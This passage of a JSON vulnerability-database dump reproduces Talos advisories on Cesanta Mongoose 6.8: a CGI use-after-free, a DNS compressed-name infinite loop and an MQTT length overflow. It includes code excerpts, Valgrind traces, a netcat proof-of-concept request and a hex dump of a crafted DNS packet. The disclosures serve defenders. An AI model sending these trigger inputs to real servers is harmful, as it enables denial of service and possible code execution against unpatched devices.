"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": 
"talos", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0428", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing a specific type of POST request that targets a CGI script, a use-after-free vulnerability is triggered, if compiled with CGI support which is the default. 
When doing the initial parsing, a structure of type `mg_connection` is allocated in the function `mg_create_connection_base`. Then, while working on a reply, and since this is a CGI request (the target of the request only needs to end with the configured CGI extension, \u201c.cgi\u201d by default), a CGI handler is invoked in the function `mg_send_http_file`:\n \n \n } else if (is_cgi) {\n #if MG_ENABLE_HTTP_CGI\n mg_handle_cgi(nc, index_file ? index_file : path, path_info, hm, opts);\n #else\n \n\nIn the function `mg_handle_cgi` a new connection structure is allocated and the previous one is attached to it:\n \n \n struct mg_connection *cgi_nc = mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler); [1]\n struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc);\n cgi_pd->cgi.cgi_nc = cgi_nc;\n cgi_pd->cgi.cgi_nc->user_data = nc; [2]\n nc->flags |= MG_F_USER_1;\n \n\nIn the above code, at [1], a new connection structure is created and at [2], the old `nc` is stored in its `user_data` field. Since the initial client connection is deemed done, it is cleaned up and the first `mg_connection` structure is freed by a call to `mg_close_conn` in the function `mg_socket_if_poll`. This leaves the `cgi_pd->cgi.cgi_nc->user_data` pointer set at [2] pointing to freed memory. Then, when the actual CGI event handler function `mg_cgi_ev_handler` executes, this freed data is accessed in different places depending on the event:\n \n \n static void mg_cgi_ev_handler(struct mg_connection *cgi_nc, int ev,\n void *ev_data) {\n struct mg_connection *nc = (struct mg_connection *) cgi_nc->user_data; [3]\n \n \n ...\n case MG_EV_CLOSE:\n mg_http_free_proto_data_cgi(&mg_http_get_proto_data(nc)->cgi); [4]\n nc->flags |= MG_F_SEND_AND_CLOSE;\n break;\n \n\nIn the above code, at [3] the pointer to the original connection structure is retrieved (which at this time points to freed memory) and is dereferenced at [4], which ultimately leads to reads and writes of freed memory. 
If a second request happens at the right time, this freed memory might contain different data or point to other structures leading to server crash and potential remote code execution with multiple carefully controlled post requests.\n\nThis vulnerability can be demonstrated via the example web server application supplied with the library. Since the server may not immediately crash, the vulnerability can be observed by running the server under memory debugger such as valgrind or AddressSanitizer.\n\n### Crash Information\n \n \n Valgrind output:\n \n ==87342== Memcheck, a memory error detector\n ==87342== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\n ==87342== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\n ==87342== Command: ./simplest_web_server\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x40BD62: mg_http_get_proto_data (mongoose.c:5054)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: 
mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x40BD84: mg_http_get_proto_data (mongoose.c:5055)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x40BD8F: mg_http_get_proto_data (mongoose.c:5056)\n ==87342== by 0x4138DD: 
mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421730 is 144 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x40BD9E: mg_http_get_proto_data (mongoose.c:5059)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in 
/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x4138F1: mg_cgi_ev_handler (mongoose.c:8250)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n 
==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x413905: mg_cgi_ev_handler (mongoose.c:8250)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87355== \n ==87355== HEAP SUMMARY:\n ==87355== in use at exit: 1,656 bytes in 9 blocks\n ==87355== 
total heap usage: 11 allocs, 2 frees, 3,704 bytes allocated\n ==87355== \n ==87355== LEAK SUMMARY:\n ==87355== definitely lost: 0 bytes in 0 blocks\n ==87355== indirectly lost: 0 bytes in 0 blocks\n ==87355== possibly lost: 0 bytes in 0 blocks\n ==87355== still reachable: 1,656 bytes in 9 blocks\n ==87355== suppressed: 0 bytes in 0 blocks\n ==87355== Rerun with --leak-check=full to see details of leaked memory\n ==87355== \n ==87355== For counts of detected and suppressed errors, rerun with: -v\n ==87355== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)\n ==87342== \n ==87342== Process terminating with default action of signal 2 (SIGINT)\n ==87342== at 0x5154573: __select_nocancel (syscall-template.S:84)\n ==87342== by 0x40AB75: mg_socket_if_poll (mongoose.c:3657)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== HEAP SUMMARY:\n ==87342== in use at exit: 416 bytes in 6 blocks\n ==87342== total heap usage: 14 allocs, 8 frees, 5,008 bytes allocated\n ==87342== \n ==87342== LEAK SUMMARY:\n ==87342== definitely lost: 72 bytes in 1 blocks\n ==87342== indirectly lost: 0 bytes in 0 blocks\n ==87342== possibly lost: 0 bytes in 0 blocks\n ==87342== still reachable: 344 bytes in 5 blocks\n ==87342== suppressed: 0 bytes in 0 blocks\n ==87342== Rerun with --leak-check=full to see details of leaked memory\n ==87342== \n ==87342== For counts of detected and suppressed errors, rerun with: -v\n ==87342== ERROR SUMMARY: 6 errors from 6 contexts (suppressed: 0 from 0)\n \n\n### Exploit Proof-of-Concept\n \n \n echo -ne \"POST /a.cgi HTTP/1.1\\r\\n\\r\\n\" | nc localhost 8000\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose HTTP Server CGI Remote Code Execcution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0398", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0398", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T22:03:02", "description": "### Summary\n\nAn infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-835: Loop with Unreachable Exit Condition (\u2018Infinite Loop\u2019)\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, DNS and others. 
It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nIn a DNS request packet, a name can be compressed to save space. The compression in question relies on pointers to parts of the domain name already present in the packet. When decompressing the names, the DNS server software must look up those pointers and substitute them accordingly.\n\nIn the Mongoose library, the function `mg_dns_uncompress_name` is responsible for decompressing names, and the special case of pointers is handled as follows:\n \n \n while ((chunk_len = *data++)) { [3]\n int leeway = dst_len - (dst - old_dst);\n if (data >= end) {\n return 0;\n }\n \n \n if (chunk_len & 0xc0) { [1]\n uint16_t off = (data[-1] & (~0xc0)) << 8 | data[0];\n if (off >= msg->pkt.len) {\n return 0;\n }\n data = (unsigned char *) msg->pkt.p + off; [2]\n continue;\n }\n \n\nA name chunk pointer is encoded in a byte whose 2 most significant bits are set (0xc0); the remaining bits, together with the following byte, form an offset to the actual name. In the above code, at [1], a check is performed to see if the current chunk is actually a pointer, and if so, the offset is extracted instead. At [2], this offset is used to advance the parser by adding it to the start of the packet. The loop then continues at [3].\n\nIn the above code, no check is performed to see if the calculated offset refers back to the same position, or if the pointer points to another pointer. No valid DNS query should have a pointer pointing to another pointer, and precisely that kind of packet will cause an infinite loop in the above code. An example packet:\n \n \n 00000000: 0020 a577 0120 0001 0000 0000 0001 c00c . .w. ..........\n 00000010: 0000 0000 0100 0100 0029 1000 0000 0000 .........)......\n 00000020: 0000 0a \u2026\n \n\nAt offset 14 above, we have the start of a name chunk, which specifies a pointer (0xc0), followed by 0x0c, which represents its offset from the start of the packet, past the 2 ID bytes. 
When parsing this packet, function `mg_dns_uncompress_name` will enter an infinite loop, because the first chunk points to itself.\n\nThis causes 100% CPU usage and Denial Of Service.\n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0416", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0416", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing an MQTT packet with a variable-length header, no check is performed to ensure that the calculated payload length corresponds to the actual received packet. An arbitrary length is used in pointer arithmetic, leading to arbitrary memory access. The variable payload length in an MQTT packet is encoded as 7-bit groups, with the 8th bit of each byte used as a continuation bit. The following code from the `parse_mqtt` function decodes this:\n \n \n /* decode mqtt variable length */\n do {\n len += (*p & 127) << 7 * (p - &io->buf[1]);\n } while ((*p++ & 128) != 0 && ((size_t)(p - io->buf) <= io->len));\n \n\nIn the above code, no check is performed on the calculated `len` value, which can be arbitrarily large. By the MQTT standard, the largest MQTT packet can be at most 256 megabytes. Further on, the following check is performed:\n \n \n end = p + len;\n if (end > io->buf + io->len + 1) {\n return -1;\n }\n \n\nIn the above code, `end` should point to the end of the message, and the `if` tries to check that it is within the bounds of the buffer, but since the check compares pointers, an integer overflow can cause `end` to wrap around and point before the start of the message buffer, while the huge `len` value calculated before is retained.\n\nThis can cause further memory corruption down the line when actually handling the commands sent in the packet. 
For example, this can be exploited by sending a \u201cPUBLISH\u201d command, which ends up notifying all the clients subscribed to a certain topic. Still in the `parse_mqtt` function we see:\n \n \n case MG_MQTT_CMD_PUBLISH: {\n if (MG_MQTT_GET_QOS(header) > 0) {\n mm->message_id = getu16(p);\n p += 2;\n }\n \n p = scanto(p, &mm->topic);\n \n mm->payload.p = p;\n mm->payload.len = end - p;\n break;\n \n\nThe above code deals with the \u201cPUBLISH\u201d command and uses the `end` pointer and `p` to calculate the payload length. Due to the previous integer overflow, `end` can point before `p`, leading to a large `payload.len` value which is later used when sending the notification to subscribed clients.\n\nWith precise memory layout control, this can be abused to cause an arbitrary write which could lead to remote code execution. On the other hand, there is a potential to abuse this vulnerability to leak a large amount of data from the process, as the overflown value is used when sending data to clients. The vulnerability can be triggered by sending the supplied proof of concept packet to the sample `mqtt_broker` application supplied with the library. 
It should be noted that depending on memory layout, the proof of concept packet might not crash the application, but it does trigger the bug.\n\n### Crash Information\n \n \n Valgrind output:\n ==118470== Memcheck, a memory error detector\n ==118470== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\n ==118470== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\n ==118470== Command: ../../../vanilla/mongoose/examples/mqtt_broker/mqtt_broker\n ==118470== \n MQTT broker started on 0.0.0.0:8113\n ffff==118470== Invalid read of size 1\n ==118470== at 0x4C3236C: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0796 is 6 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: 
mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Invalid write of size 1\n ==118470== at 0x4C32372: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0798 is 8 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 
